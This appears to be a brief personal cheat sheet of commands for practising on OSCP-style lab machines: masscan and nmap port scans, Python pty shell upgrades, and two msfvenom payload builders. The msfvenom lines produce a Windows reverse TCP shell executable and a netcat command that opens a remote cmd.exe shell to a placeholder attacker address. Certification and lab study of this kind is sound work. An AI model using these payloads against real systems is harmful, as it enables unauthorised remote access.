OSCP-like boxes

Handy Commands

I list here commands that I often use in solving boxes.

Port Scanning

Using masscan to check for open ports:

sudo masscan -p1-65535,U:1-65535 <target-ip> --rate=1000 -e tun0

Using nmap to scan for further information on open ports:

sudo nmap -p <open-ports> -sV -sC <target-ip> -oA <output-filename>

Setting up shell

which python python3 # check which Python is available
python -c 'import pty;pty.spawn("/bin/bash")' # if Python 2 is available
python3 -c 'import pty;pty.spawn("/bin/bash")' # if Python 3 is available

MSFvenom

windows/shell/reverse_tcp:

msfvenom -p windows/shell/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> EXITFUNC=thread -f exe -a x86 --platform windows > exploit.exe

cmdexec - netcat:

msfvenom -p windows/exec cmd='\\<target-ip>\smb\nc.exe <attacker-ip> <attacker-port> -e cmd.exe' EXITFUNC=thread -f exe -a x86 --platform windows > exec-exploit.exe

Last updated 4 years ago
